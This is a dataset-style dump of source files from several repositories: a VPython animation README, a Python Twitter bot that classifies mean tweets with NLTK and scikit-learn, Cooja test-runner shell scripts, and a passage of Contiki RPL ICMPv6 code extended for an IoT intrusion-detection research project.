"length_bytes": 1704,
"license_type": "no_license",
"max_line_length": 352,
"num_lines": 14,
"path": "/README.md",
"repo_name": "imotyashok/dancing-dude",
"src_encoding": "UTF-8",
"text": "# Dancing Dude \n## Project Info\nThis was a final project for a course I took during the fall of 2018. It is a simple, short 3D animation of a little stick figure dancing. It was created using the online GlowScript IDE and was written in python 2.7 using the VPython library (which unfortunately makes the program a little outdated). \n\nTo view the animation, you can follow this link: https://www.glowscript.org/#/user/Iryna/folder/MyPrograms/program/finalprojectwithfunctions\n\n## Possible Improvements \nThis was written a long time ago when I was very new to object oriented programming (and programming in general) using an older version of VPython and python. I am still proud of this project since it took countless hours to make and I like the resulting animation, but looking back on it now, there are a number of ways in which it could be improved. \n#### Code length\nThe first thing you may notice right away is that the code for this is long. Very long. There are around 650 lines of code for a 10-15 second animation. A large number of lines of code isn't necessarily bad, but in my case, a lot of the code seems very repetitive. I could simplify the code a lot more if I used better defined functions. \n#### Main function\nThis isn't an absolute necessity, but if I were to rewrite this program, I would include a main function for clarity and organization purposes.\n#### Classes\nThe program does not include any classes, but it would make sense to make a StickPerson class where I would initialize each component of the stick person (arms, head, torso, legs) to make the program more object oriented and organized rather than just making separate functions for the arms, head, torso, and legs. \n"
}
] | 2 |
ctaylor08/nice-bot | https://github.com/ctaylor08/nice-bot | 7cd0974d1422f6c3e7366054fa07c703d3d19afc | 2a4fca27caa14af35b08b4306ddbfc5eb5f073c5 | 552196f465eed3e056e3078c56cbc251c35630c5 | refs/heads/master | 2023-02-17T04:22:50.270879 | 2016-12-02T03:09:02 | 2016-12-02T03:09:02 | 74,526,074 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.573383092880249,
"alphanum_fraction": 0.5779436230659485,
"avg_line_length": 31.608108520507812,
"blob_id": "c250581587c994237fe4ccc47c1809ebdab983d3",
"content_id": "0c41b84f193a718921a712845f2b133fc93e207b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2412,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 74,
"path": "/nicebot/__init__.py",
"repo_name": "ctaylor08/nice-bot",
"src_encoding": "UTF-8",
"text": "#usr/bin/python3\nimport os\nimport configparser\nimport json\nimport logging\nimport re\nfrom tweepy import Stream, OAuthHandler\nfrom tweepy.streaming import StreamListener\ntry:\n import meany\nexcept ImportError:\n from . import meany\n\nconfig = configparser.ConfigParser()\nconfig.read(os.path.join(os.path.dirname(__file__), 'nicebot_conf.ini'))\ntwitter_auth = config['twitter_auth']\nlogging.basicConfig(filename='nicelog.log', filemode='w', level=logging.INFO)\n\nfrom nltk.corpus import stopwords\nconfig['random_stuff']['words'] = ','.join(list(set(stopwords.words('english'))))\n\nclass Listener(StreamListener):\n\n def __init__(self, log=True):\n self.log = log\n\n def on_data(self, data):\n all_data = json.loads(data)\n tweet = all_data.get('text')\n if tweet and '@' in tweet and not tweet.startswith('RT '):\n tweet_body = tweet.replace('\\n', ' ').strip()\n tweet_text = re.sub(r'([@|#][\\S]{1,})|(http[s|]:\\/\\/[\\S]{1,})', '', tweet_body)\n mean = meany.meany(tweet_text)\n mean.is_mean()\n if mean.mean:\n print('### MEAN ###\\n')\n print(tweet_body)\n print('')\n elif not mean.mean:\n print('### NOT MEAN ###\\n')\n print(tweet_body)\n print('')\n if self.log:\n logging.info(str(mean.mean) + ' <<< ' + tweet_body + ' >>>')\n return True\n \n def on_error(self, status):\n logging.warning(status)\n \nauth = OAuthHandler(twitter_auth['ckey'], twitter_auth['csecret'])\nauth.set_access_token(twitter_auth['atkn'], twitter_auth['asecret'])\n\n\ndef enable_stream(which='nice_stuff', **kwargs):\n if which not in ['nice_stuff', 'mean_stuff', 'random_stuff']:\n raise ValueError(\"which param must be either 'nice_stuff', 'mean_stuff', or 'random_stuff'\")\n twitterStream = Stream(auth, Listener(**kwargs))\n try:\n twitterStream.filter(track=config[which]['words'].split(','))\n except KeyboardInterrupt:\n print('\\nnicebot disabled')\n \n \nif __name__ == '__main__':\n import time\n print(\"Let's kill em with kindness!\")\n print(\"- press Ctrl+c to disable at anytime\")\n print(\"- Starting in\")\n s = 1\n for sec in ['5','4','3','2','1']:\n print(' '*s + sec)\n s += 1\n time.sleep(1)\n enable_stream(which='random_stuff')"
},
{
"alpha_fraction": 0.8290598392486572,
"alphanum_fraction": 0.8290598392486572,
"avg_line_length": 57.5,
"blob_id": "3b66b2b3907f0277b5edeca986a2def5e085d654",
"content_id": "75591df401954ddf3653ab25346379b86f370baf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 117,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 2,
"path": "/README.md",
"repo_name": "ctaylor08/nice-bot",
"src_encoding": "UTF-8",
"text": "# nice-bot\nPython program that performs sentiment-analysis against Twitter, responding to mean tweets with nice ones\n"
},
{
"alpha_fraction": 0.6307870149612427,
"alphanum_fraction": 0.6342592835426331,
"avg_line_length": 24.41176414489746,
"blob_id": "8d50514d8f2aa887658fc402a8e5ce7d3435b217",
"content_id": "4ad09c7319c143abc49763e5522185d78cbc84a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 864,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 34,
"path": "/nicebot/meany.py",
"repo_name": "ctaylor08/nice-bot",
"src_encoding": "UTF-8",
"text": "from nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nimport pickle\nimport os\n\nf = open(os.path.join('sample_data', 'lr_classifier.pickle'), 'rb')\nmean_classifier = pickle.load(f)\nf.close()\n\nf = open(os.path.join('sample_data', 'word_features.pickle'), 'rb')\nword_features = pickle.load(f)\nf.close()\n\ndef find_features(doc):\n words = word_tokenize(doc)\n features = {}\n for w in word_features:\n features[w] = (w in words)\n return features\n\nclass meany(object):\n \n def __init__(self, text):\n self.text = text\n self.features = find_features(self.text)\n self.mean = 0\n \n def is_mean(self):\n '''\n Determines if the self.text is mean or not\n self.text -> bool (1 or 0)\n '''\n self.mean = mean_classifier.classify(self.features)\n"
},
{
"alpha_fraction": 0.7157712578773499,
"alphanum_fraction": 0.723088800907135,
"avg_line_length": 38.04511260986328,
"blob_id": "aa245097f044f222d7f4573e01d4417197ac36c4",
"content_id": "f33249cbabdf4032698b55d39596fe33bce6690d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5193,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 133,
"path": "/nicebot/sample_data/test_classifiers.py",
"repo_name": "ctaylor08/nice-bot",
"src_encoding": "UTF-8",
"text": "import nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk.classify.scikitlearn import SklearnClassifier\nfrom sklearn.naive_bayes import MultinomialNB, BernoulliNB\nfrom sklearn.linear_model import LogisticRegression, SGDClassifier\nfrom sklearn.svm import SVC, LinearSVC, NuSVC\nfrom nltk.classify import DecisionTreeClassifier, MaxentClassifier, ClassifierI\nfrom statistics import mode\nimport random\nimport pickle\n\ndef pickle_it(obj, fname):\n f = open(fname, 'wb')\n pickle.dump(obj, f)\n f.close()\n\nwith open('mean.txt') as f:\n data = f.read()\n mean_tweets = [(line.lower(), 1) for line in data.split('\\n')]\n mean_tkn_fltrd = [w.lower() for w in word_tokenize(data) if w.lower() not in set(stopwords.words('english'))]\n \nwith open('nice.txt') as f:\n data = f.read()\n nice_tweets = [(line.lower(), 0) for line in data.split('\\n')]\n nice_tkn_fltrd = [w.lower() for w in word_tokenize(data) if w.lower() not in set(stopwords.words('english'))]\n \nall_tweets = mean_tweets + nice_tweets\nall_tkn_fltrd = mean_tkn_fltrd + nice_tkn_fltrd\n\nall_dist = nltk.FreqDist(all_tkn_fltrd)\n\nword_features = list(all_dist.keys())\npickle_it(word_features, 'word_features.pickle')\n\ndef find_features(doc):\n words = word_tokenize(doc)\n features = {}\n for w in word_features:\n features[w] = (w in words)\n \n return features\npickle_it(find_features, 'find_features.pickle')\n \nfeaturesets = [(find_features(tweet), score) for (tweet, score) in all_tweets]\nrandom.shuffle(featuresets)\n\nhalf = int(len(featuresets)/2)\n\ntraining_set = featuresets[:half]\ntesting_set = featuresets[half:]\n\n\nclass VoteClassifier(ClassifierI):\n def __init__(self, *classifiers):\n self._classifiers = classifiers\n\n def classify(self, features):\n votes = []\n for c in self._classifiers:\n v = c.classify(features)\n votes.append(v)\n return mode(votes)\n\n def confidence(self, features):\n votes = []\n for c in self._classifiers:\n v = c.classify(features)\n votes.append(v)\n\n choice_votes = votes.count(mode(votes))\n conf = choice_votes / len(votes)\n return conf\n\n \nclassifier = nltk.NaiveBayesClassifier.train(training_set)\nprint(\"Original Naive Bayes Algo accuracy percent:\", (nltk.classify.accuracy(classifier, testing_set))*100)\nclassifier.show_most_informative_features(15)\npickle_it(classifier, 'nb_classifier.pickle')\n\nDT_classifier = DecisionTreeClassifier.train(training_set)\nprint(\"DT_classifier accuracy percent:\", (nltk.classify.accuracy(DT_classifier, testing_set))*100)\npickle_it(DT_classifier, 'dt_classifier.pickle')\n\n#ME_classifier = MaxentClassifier.train(training_set)\n#print(\"ME_classifier accuracy percent:\", (nltk.classify.accuracy(ME_classifier, testing_set))*100)\n#pickle_it(ME_classifier, 'me_classifier.pickle')\n\nMNB_classifier = SklearnClassifier(MultinomialNB())\nMNB_classifier.train(training_set)\nprint(\"MNB_classifier accuracy percent:\", (nltk.classify.accuracy(MNB_classifier, testing_set))*100)\npickle_it(MNB_classifier, 'mnb_classifier.pickle')\n\nBernoulliNB_classifier = SklearnClassifier(BernoulliNB())\nBernoulliNB_classifier.train(training_set)\nprint(\"BernoulliNB_classifier accuracy percent:\", (nltk.classify.accuracy(BernoulliNB_classifier, testing_set))*100)\npickle_it(BernoulliNB_classifier, 'bnb_classifier.pickle')\n\nLogisticRegression_classifier = SklearnClassifier(LogisticRegression())\nLogisticRegression_classifier.train(training_set)\nprint(\"LogisticRegression_classifier accuracy percent:\", (nltk.classify.accuracy(LogisticRegression_classifier, testing_set))*100)\npickle_it(LogisticRegression_classifier, 'lr_classifier.pickle')\n\nSGDClassifier_classifier = SklearnClassifier(SGDClassifier())\nSGDClassifier_classifier.train(training_set)\nprint(\"SGDClassifier_classifier accuracy percent:\", (nltk.classify.accuracy(SGDClassifier_classifier, testing_set))*100)\npickle_it(SGDClassifier_classifier, 'sgdc_classifier.pickle')\n\nSVC_classifier = SklearnClassifier(SVC())\nSVC_classifier.train(training_set)\nprint(\"SVC_classifier accuracy percent:\", (nltk.classify.accuracy(SVC_classifier, testing_set))*100)\npickle_it(SVC_classifier, 'svc_classifier.pickle')\n\nLinearSVC_classifier = SklearnClassifier(LinearSVC())\nLinearSVC_classifier.train(training_set)\nprint(\"LinearSVC_classifier accuracy percent:\", (nltk.classify.accuracy(LinearSVC_classifier, testing_set))*100)\npickle_it(LinearSVC_classifier, 'lsvc_classifier.pickle')\n\nNuSVC_classifier = SklearnClassifier(NuSVC())\nNuSVC_classifier.train(training_set)\nprint(\"NuSVC_classifier accuracy percent:\", (nltk.classify.accuracy(NuSVC_classifier, testing_set))*100)\npickle_it(NuSVC_classifier, 'nsvc_classifier.pickle')\n\n\n\nvoted_classifier = VoteClassifier(\n NuSVC_classifier,\n LinearSVC_classifier,\n MNB_classifier,\n BernoulliNB_classifier,\n LogisticRegression_classifier)\n\nprint(\"voted_classifier accuracy percent:\", (nltk.classify.accuracy(voted_classifier, testing_set))*100)\n"
}
] | 4 |
philok93/IoTIDS | https://github.com/philok93/IoTIDS | 97caf05bb65647c0f7ed4c8c5044f99ab3b8c840 | 90e88780408d491110fd39c2c5aded90e05ca586 | b2c50961cf21569441fd3d09c0274942f6f044da | refs/heads/master | 2023-04-11T15:12:15.083421 | 2021-06-29T19:57:51 | 2021-06-29T19:57:51 | 141,921,505 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6207800507545471,
"alphanum_fraction": 0.6479842662811279,
"avg_line_length": 25.53043556213379,
"blob_id": "8ba310da0bb87fc501b20564fa66b8557646616a",
"content_id": "c587d2eb6eff6cef714a0613a00f1397bd48caba",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 3051,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 115,
"path": "/tools/cooja/Testing/RUN_only1.sh",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# Usage\nif [ $# -eq 2 ]; then\n REPEATS=$1\n TEST=$2\nelse\n echo \"Usage: $0 <nr_repeats> <test>\"\n echo \"Example: $0 10 cooja_helloworld\"\n exit 1\nfi\n\n# Locate Contiki/COOJA\nif [ -z \"$CONTIKI\" ]; then\n if [ -z \"$CONTIKI_HOME\" ]; then\n \tCONTIKI_HOME=../../..\n fi\n CONTIKI=$CONTIKI_HOME\nfi\n\n# Clean up\nrm -f *.log *.cooja_log\nrm -fr se obj_cooja\nrm -f symbols.c symbols.h\n\n# Compile COOJA\necho \">>>>>>> Building COOJA <<<<<<<<\"\n(cd $CONTIKI/tools/cooja && ant clean && ant jar)\nif [ \"$?\" != \"0\" ]; then\n echo \"Compilation of COOJA failed\"\n exit 1\nfi\n\nTEST1=read_IDS_allnodes_sciptIDS5_clone\nTEST2=read_IDS_allnodes_sciptIDS1-clone\n#TEST3=read_IDS_allnodes_sciptIDS2-clone\n# TEST4=read_IDS_allnodes_sciptIDS4-clone\n# TEST5=read_IDS_allnodes_sciptIDS5_clone\n# TEST6=read_IDS_allnodes_sciptIDS6-clone\n# TEST7=read_IDS_allnodes_sciptIDS7-clone\n# TEST8=read_IDS_allnodes_sciptIDS8-clone\n# TEST9=read_IDS_allnodes_sciptIDS9-clone\n# TEST10=read_IDS_allnodes_sciptIDS10-clone\n\n\nfor COUNTER in `seq 1 $REPEATS`;\ndo\n echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST1-$COUNTER.log <<<<<<<<\"\n bash RUN_TEST.sh $TEST1 RUN_REPEATED_LAST.log\n mv $TEST1.log clone_test/$TEST1-$COUNTER.log\ndone\n\nfor COUNTER in `seq 1 $REPEATS`;\ndo\n echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST2-$COUNTER.log <<<<<<<<\"\n bash RUN_TEST.sh $TEST2 RUN_REPEATED_LAST.log\n mv $TEST2.log clone_test/$TEST2-$COUNTER.log\ndone\n\n# for COUNTER in `seq 1 $REPEATS`;\n# do\n# echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST4-$COUNTER.log <<<<<<<<\"\n# bash RUN_TEST.sh $TEST4 RUN_REPEATED_LAST.log\n# mv $TEST4.log clone_test/$TEST4-$COUNTER.log\n# done\n\n# for COUNTER in `seq 1 $REPEATS`;\n# do\n# echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST5-$COUNTER.log <<<<<<<<\"\n# bash RUN_TEST.sh $TEST5 RUN_REPEATED_LAST.log\n# mv $TEST5.log clone_test/$TEST5-$COUNTER.log\n# done\n\n# for COUNTER in `seq 1 $REPEATS`;\n# do\n# echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST6-$COUNTER.log <<<<<<<<\"\n# bash RUN_TEST.sh $TEST6 RUN_REPEATED_LAST.log\n# mv $TEST6.log clone_test/$TEST6-$COUNTER.log\n# done\n\n# for COUNTER in `seq 1 $REPEATS`;\n# do\n# echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST7-$COUNTER.log <<<<<<<<\"\n# bash RUN_TEST.sh $TEST7 RUN_REPEATED_LAST.log\n# mv $TEST7.log clone_test/$TEST7-$COUNTER.log\n# done\n\n\n# for COUNTER in `seq 1 $REPEATS`;\n# do\n# echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST8-$COUNTER.log <<<<<<<<\"\n# bash RUN_TEST.sh $TEST8 RUN_REPEATED_LAST.log\n# mv $TEST8.log clone_test/$TEST8-$COUNTER.log\n# done\n\n\n# for COUNTER in `seq 1 $REPEATS`;\n# do\n# echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST9-$COUNTER.log <<<<<<<<\"\n# bash RUN_TEST.sh $TEST9 RUN_REPEATED_LAST.log\n# mv $TEST9.log clone_test/$TEST9-$COUNTER.log\n# done\n\n# for COUNTER in `seq 1 $REPEATS`;\n# do\n# echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST10-$COUNTER.log <<<<<<<<\"\n# bash RUN_TEST.sh $TEST10 RUN_REPEATED_LAST.log\n# mv $TEST10.log clone_test/$TEST10-$COUNTER.log\n# done\n\n\necho\ncat RUN_REPEATED_LAST.log\necho\necho \">>>>>>> DONE! Test logs stored in $TEST1-[1-$REPEATS].log <<<<<<<<\"\n"
},
{
"alpha_fraction": 0.6193993091583252,
"alphanum_fraction": 0.6489413976669312,
"avg_line_length": 21.318681716918945,
"blob_id": "aad15343d74755767e69c7c2718d33ef14178297",
"content_id": "fb6080212bdb8837cc2de55a104d11084259bb21",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2031,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 91,
"path": "/tools/cooja/Testing/RUN_mine_mals.sh",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# Usage\n#RUNS 1 MLAICIOUS AND 3 NORMAL NODES\nif [ $# -eq 2 ]; then\n REPEATS=$1\n TEST=$2\nelse\n echo \"Usage: $0 <nr_repeats> <test>\"\n echo \"Example: $0 10 cooja_helloworld\"\n exit 1\nfi\n\n# Locate Contiki/COOJA\nif [ -z \"$CONTIKI\" ]; then\n if [ -z \"$CONTIKI_HOME\" ]; then\n \tCONTIKI_HOME=../../..\n fi\n CONTIKI=$CONTIKI_HOME\nfi\n\n# Clean up\nrm -f *.log *.cooja_log\nrm -fr se obj_cooja\nrm -f symbols.c symbols.h\n\n# Compile COOJA\necho \">>>>>>> Building COOJA <<<<<<<<\"\n(cd $CONTIKI/tools/cooja && ant clean && ant jar)\nif [ \"$?\" != \"0\" ]; then\n echo \"Compilation of COOJA failed\"\n exit 1\nfi\n\nTEST11=testwith1mals\nTEST2=testwith2mals\nTEST3=testwith3mals\nTEST4=testwith4mals\nTEST5=testwith5mals\nTEST6=testwith6mals\n\n\n# Run tests\nfor COUNTER in `seq 1 $REPEATS`;\ndo\n echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST11-$COUNTER.log <<<<<<<<\"\n bash RUN_TEST.sh $TEST11 RUN_REPEATED_LAST.log\n mv $TEST11.log $TEST11-$COUNTER.log\ndone\n\nfor COUNTER in `seq 1 $REPEATS`;\ndo\n echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST2-$COUNTER.log <<<<<<<<\"\n bash RUN_TEST.sh $TEST2 RUN_REPEATED_LAST.log\n mv $TEST2.log $TEST2-$COUNTER.log\ndone\n\nfor COUNTER in `seq 1 $REPEATS`;\ndo\n echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST3-$COUNTER.log <<<<<<<<\"\n bash RUN_TEST.sh $TEST3 RUN_REPEATED_LAST.log\n mv $TEST3.log $TEST3-$COUNTER.log\ndone\n\n\nfor COUNTER in `seq 1 $REPEATS`;\ndo\n echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST4-$COUNTER.log <<<<<<<<\"\n bash RUN_TEST.sh $TEST4 RUN_REPEATED_LAST.log\n mv $TEST4.log $TEST4-$COUNTER.log\ndone\n\nfor COUNTER in `seq 1 $REPEATS`;\ndo\n echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST5-$COUNTER.log <<<<<<<<\"\n bash RUN_TEST.sh $TEST5 RUN_REPEATED_LAST.log\n mv $TEST5.log $TEST5-$COUNTER.log\ndone\n\nfor COUNTER in `seq 1 $REPEATS`;\ndo\n echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST6-$COUNTER.log <<<<<<<<\"\n bash RUN_TEST.sh $TEST6 RUN_REPEATED_LAST.log\n mv $TEST6.log $TEST6-$COUNTER.log\ndone\n\n\necho\ncat RUN_REPEATED_LAST.log\necho\necho \">>>>>>> DONE! Test logs stored in $TEST-[1-$REPEATS].log <<<<<<<<\"\n"
},
{
"alpha_fraction": 0.4928741157054901,
"alphanum_fraction": 0.5112826824188232,
"avg_line_length": 31.171939849853516,
"blob_id": "a48598f37a0cea3be195f05e73952e89e5096eaf",
"content_id": "c24dc7faca1777302835830ab12432ec79da29eb",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 53888,
"license_type": "permissive",
"max_line_length": 200,
"num_lines": 1675,
"path": "/os/net/routing/rpl-lite/rpl-icmp6.c",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (c) 2010, Swedish Institute of Computer Science.\n * All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n * 1. Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n * 2. Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n * 3. Neither the name of the Institute nor the names of its contributors\n * may be used to endorse or promote products derived from this software\n * without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE INSTITUTE AND CONTRIBUTORS ``AS IS'' AND\n * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n * ARE DISCLAIMED. IN NO EVENT SHALL THE INSTITUTE OR CONTRIBUTORS BE LIABLE\n * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS\n * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\n * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF\n * SUCH DAMAGE.\n *\n * This file is part of the Contiki operating system.\n *\n */\n\n/**\n * \\addtogroup rpl-lite\n * @{\n *\n * \\file\n * ICMP6 I/O for RPL control messages.\n *\n * \\author Joakim Eriksson <[email protected]>, Nicolas Tsiftes <[email protected]>,\n * Simon Duquennoy <[email protected]>\n * Contributors: Niclas Finne <[email protected]>, Joel Hoglund <[email protected]>,\n * Mathieu Pouillot <[email protected]>,\n * George Oikonomou <[email protected]> (multicast)\n */\n\n#include \"net/routing/rpl-lite/rpl.h\"\n#include \"net/ipv6/uip-icmp6.h\"\n#include \"net/packetbuf.h\"\n#include \"lib/random.h\"\n#include \"net/routing/rpl-lite/rpl-neighbor.h\"\n#include \"net/link-stats.h\"\n\n#if IDS_SERVER == 1 || IDS_CLIENT==1 || IDS_OF==1\n#include \"ids.h\"\n#include \"net/netstack.h\"\n\n#include \"contiki.h\"\n#include \"net/routing/routing.h\"\n\n#endif\n\n#include <limits.h>\n\n/* Log configuration */\n#include \"sys/log.h\"\n#define LOG_MODULE \"RPL\"\n#define LOG_LEVEL LOG_LEVEL_RPL\n\n/*---------------------------------------------------------------------------*/\n#define RPL_DIO_GROUNDED 0x80\n#define RPL_DIO_MOP_SHIFT 3\n#define RPL_DIO_MOP_MASK 0x38\n#define RPL_DIO_PREFERENCE_MASK 0x07\n\n/*---------------------------------------------------------------------------*/\nstatic void dis_input(void);\nstatic void dio_input(void);\nstatic void dao_input(void);\n\n\n#if MALICIOUS==0 && IDS_CLIENT ==1 && IDS_SERVER == 0 && !CLONE_ATTACK && IDS_OF==1\nfw_stats nbr_stats;\n#endif\n\n#if IDS_OF==1\n uint32_t last_time_from_ids=0;\n#endif\n\n//Added IDS\n#if IDS_CLIENT==1 || IDS_SERVER == 1\n//void ids_output(uip_ipaddr_t *addr);\n//void ids_input(void);\nuip_ipaddr_t IdsServerAddr;\nuint16_t ip_end = 0;\nuint8_t endofIP = 0;\nuint16_t countInNodes = 0;\nextern uint8_t flag_is_ids;\n#endif /*IDS_CLIENT || IDS_SERVER*/\n\n#if IDS_CLIENT==1\nuint32_t DISvalues = 0;\nuint32_t intervals = 0;\nextern ids_ctr_t nodes[NODES_NUM_CL];\n\nNBR_TABLE_GLOBAL(fw_stats, nbr_fw_stats);\n#elif IDS_SERVER == 1\nuint32_t BR_last_time_from_ids=0;\nuint16_t detectorsIP[DETECTORS_NUM];\n//Average time,number of DIS for IDS\nextern ids_ctr_t nodes[NODES_NUM];\n#endif /*IDS_SERVER*/\n\n#if MAL_EXT\n//Malicious flag ext\nextern char flag_ext;\n#endif\n\n/*---------------------------------------------------------------------------*/\n/* Initialize RPL ICMPv6 message handlers */\nUIP_ICMP6_HANDLER(dis_handler, ICMP6_RPL, RPL_CODE_DIS, dis_input);\nUIP_ICMP6_HANDLER(dio_handler, ICMP6_RPL, RPL_CODE_DIO, dio_input);\nUIP_ICMP6_HANDLER(dao_handler, ICMP6_RPL, RPL_CODE_DAO, dao_input);\n\n#if MAL_EXT\n//Malicious input handler\nUIP_ICMP6_HANDLER(mal_handler, ICMP6_RPL, RPL_CODE_MAL, mal_input);\n#endif\n\n#if IDS_CLIENT==1 || IDS_SERVER == 1\nUIP_ICMP6_HANDLER(ids_handler, ICMP6_RPL, RPL_CODE_IDS, ids_input);\n\n#endif /*IDS_CLIENT*/\n\n#if IDS_SERVER == 1\nUIP_ICMP6_HANDLER(ids_BH_handler, ICMP6_RPL, RPL_CODE_IDS2, ids_blackhole_input);\n#endif /*IDS_CLIENT*/\n\n#if IDS_CLIENT==0 && IDS_SERVER == 0 && !MALICIOUS && !CLONE_ATTACK && IDS_OF\n//Add handler for message from ids to normal node\nUIP_ICMP6_HANDLER(ids_to_normal_handler, ICMP6_RPL, RPL_CODE_IDS_NORM, ids_input_benign);\n#endif\n\n#if RPL_WITH_DAO_ACK\nstatic void dao_ack_input(void);\nUIP_ICMP6_HANDLER(dao_ack_handler, ICMP6_RPL, RPL_CODE_DAO_ACK, dao_ack_input);\n#endif /* RPL_WITH_DAO_ACK */\n\n/*---------------------------------------------------------------------------*/\nstatic uint32_t\nget32(uint8_t *buffer, int pos)\n{\n return ((uint32_t)buffer[pos] << 24 | (uint32_t)buffer[pos + 1] << 16 |\n (uint32_t)buffer[pos + 2] << 8 | buffer[pos + 3]);\n}\n/*---------------------------------------------------------------------------*/\nstatic void\nset32(uint8_t *buffer, int pos, uint32_t value)\n{\n buffer[pos++] = value >> 24;\n buffer[pos++] = (value >> 16) & 0xff;\n buffer[pos++] = (value >> 8) & 0xff;\n buffer[pos++] = value & 0xff;\n}\n/*---------------------------------------------------------------------------*/\nstatic uint16_t\nget16(uint8_t *buffer, int pos)\n{\n return (uint16_t)buffer[pos] << 8 | buffer[pos + 1];\n}\n/*---------------------------------------------------------------------------*/\nstatic void\nset16(uint8_t *buffer, int pos, uint16_t value)\n{\n buffer[pos++] = value >> 8;\n buffer[pos++] = value & 0xff;\n}\n/*---------------------------------------------------------------------------*/\nuip_ds6_nbr_t *\nrpl_icmp6_update_nbr_table(uip_ipaddr_t *from, nbr_table_reason_t reason, void *data)\n{\n uip_ds6_nbr_t *nbr;\n\n if ((nbr = uip_ds6_nbr_lookup(from)) == NULL)\n {\n if ((nbr = uip_ds6_nbr_add(from, (uip_lladdr_t *)packetbuf_addr(PACKETBUF_ADDR_SENDER),\n 0, NBR_REACHABLE, reason, data)) == NULL)\n {\n LOG_ERR(\"could not add neighbor to cache \");\n LOG_ERR_6ADDR(from);\n LOG_ERR_(\", \");\n LOG_ERR_LLADDR(packetbuf_addr(PACKETBUF_ADDR_SENDER));\n LOG_ERR_(\"\\n\");\n }\n }\n\n return nbr;\n}\n/*---------------------------------------------------------------------------*/\nstatic void\ndis_input(void)\n{\n\n // #if IDS_CLIENT || IDS_SERVER\n // unsigned char *buffer;\n // buffer=UIP_ICMP_PAYLOAD;\n // char flag_ids=buffer[1];\n \n // #endif\n\n if (!curr_instance.used)\n {\n LOG_WARN(\"dis_input: not in an instance yet, discard\\n\");\n goto discard;\n }\n\n \n LOG_INFO(\"received a DIS from \");\n LOG_INFO_6ADDR(&UIP_IP_BUF->srcipaddr);\n LOG_INFO_(\"\\n\");\n\n// #if IDS_CLIENT\n// unsigned char *buffer;\n// buffer=UIP_ICMP_PAYLOAD;\n// if (buffer[1]==2){\n// flag_is_ids=2;\n// LOG_INFO(\"enn\\n\");\n// rpl_process_dis(&UIP_IP_BUF->srcipaddr, uip_is_addr_mcast(&UIP_IP_BUF->destipaddr));\n// //rpl_process_dis(&UIP_IP_BUF->srcipaddr,0);\n// }\n// #else\n rpl_process_dis(&UIP_IP_BUF->srcipaddr, uip_is_addr_mcast(&UIP_IP_BUF->destipaddr));\n // #endif\n\ndiscard:\n uipbuf_clear();\n}\n/*---------------------------------------------------------------------------*/\nvoid rpl_icmp6_dis_output(uip_ipaddr_t *addr)\n{\n unsigned char *buffer;\n\n /* Make sure we're up-to-date before sending data out */\n rpl_dag_update_state();\n\n buffer = UIP_ICMP_PAYLOAD;\n buffer[0] = buffer[1] = 0;\n\n #if IDS_CLIENT==1\n //overwrite reserve fields in DIS object for IDS\n // LOG_INFO(\"send as ids\\n\");\n \n buffer[1]=0x02;\n #endif\n\n if (addr == NULL)\n {\n addr = 